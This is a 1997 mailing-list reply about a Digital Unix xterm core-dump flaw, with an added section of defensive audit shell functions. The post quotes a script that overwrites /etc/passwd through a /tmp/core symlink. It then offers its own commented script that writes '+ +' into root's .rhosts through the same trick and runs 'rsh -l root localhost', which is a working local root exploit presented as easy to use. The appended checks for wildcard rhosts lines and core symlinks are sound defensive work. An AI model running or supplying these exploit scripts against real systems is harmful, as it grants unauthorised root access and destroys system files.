Re: Digital Unix Security Problem

Andrew Brown (codewarrior@daemon.org)
Thu, 13 Nov 1997 11:32:23 -0500

> Even with a buffer overflow, I've never seen anyone exploit on one
>DU. If anyone has done so successfully, please email me. Despite that, a
>person with basic knowledge of unix could easily do something like:
>
>#!/bin/csh
>cd /tmp
>ln -s /etc/passwd /tmp/core
>setenv DISPLAY abcdefghi
>/usr/bin/X11/xterm
>
> The contents of /etc/passwd become xterm's core, preventing
>further logins. Obviously you could do things without an immediate impact
>such as ln -s /vmunix /tmp/core.

or...if the system you're on is actually running r-services, you could do

#!/bin/sh
# DISPLAY carries "+ +" on a line of its own, bracketed by newlines,
# so it lands in the dump as a complete rhosts line
DISPLAY="
+ +
"
export DISPLAY
cd /tmp
# xterm crashes and dumps core; the dump follows the symlink into /.rhosts
ln -s /.rhosts /tmp/core
/usr/bin/X11/xterm
# /.rhosts now holds "+ +": any user from any host is trusted as root
rsh -l root localhost

which sets the DISPLAY variable to an "admit all from all" line and
the core dump will go into root's .rhosts file. then all that remains
is the rsh localhost and you're all set!

considerably easier than a buffer overflow exploit...

--
|-----< "CODE WARRIOR" >-----|
andrew@echonyc.com (TheMan)        * "ah!  i see you have the internet
codewarrior@daemon.org                               that goes *ping*!"
warfare@graffiti.com      * "information is power -- share the wealth."
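Two checks a practitioner would run on a host exposed to the trick in this thread, as an added example that is not part of the original post: one tells whether an rhosts file (or a core dump written over one) contains an "any host" line, the other reports a symlink named core in a spool directory. The third function writes a constructed stand-in for a core file so the check can be exercised offline; it is not a real dump, and the function and file names are my own.

```shell
#!/bin/sh
# Added example, not from the original post: two audit checks for the
# symlink-to-core trick above, plus a constructed stand-in for a core
# file showing why the trick works. Function and file names are assumed.

# rhosts_wildcard FILE: return 0 if FILE has a line whose host field is
# "+" (rhosts treats "+", "+ +" and "+ user" as "any host"), else 1.
# Non-printable bytes are mapped to "?" first so the check also works on
# a binary file such as a core dump that was written over .rhosts.
rhosts_wildcard() {
    LC_ALL=C tr -c '[:print:]\n' '?' < "$1" |
        awk '$1 == "+" { hit = 1 } END { exit hit ? 0 : 1 }'
}

# core_symlinks DIR: print "DIR/core -> target" if DIR/core is a symlink
# (the setup step of the attack); return 0 if found, 1 otherwise.
core_symlinks() {
    cs_found=1
    for cs_f in "$1"/core; do
        [ -L "$cs_f" ] || continue
        printf '%s -> %s\n' "$cs_f" "$(readlink "$cs_f")"
        cs_found=0
    done
    return $cs_found
}

# make_fake_core OUT: write a constructed file that imitates the layout
# of a dump: binary junk, then the environment block carrying the DISPLAY
# value from the post, then more junk. It is not a real core dump.
make_fake_core() {
    {
        printf '\177ELF\001\002\000\000junk\377\376\000'
        printf 'HOME=/\000DISPLAY=\n+ +\n\000TERM=xterm\000'
        printf '\000\000\377garbage\001'
    } > "$1"
}

# Stand-alone demo on a scratch directory with constructed data only.
demo() {
    d=$(mktemp -d) || return 1
    ln -s "$d/victim" "$d/core"
    make_fake_core "$d/victim"
    core_symlinks "$d"
    rhosts_wildcard "$d/victim" && echo "$d/victim grants access to any host"
    rm -rf "$d"
}

demo
```

The awk test looks only at the first field, so a legitimate entry like "host +" (any user from one named host) is not flagged; widen it if your policy also forbids user wildcards. Mapping non-printables to "?" rather than deleting them matters: deleting could glue junk onto a neighbouring line and hide or fabricate a match.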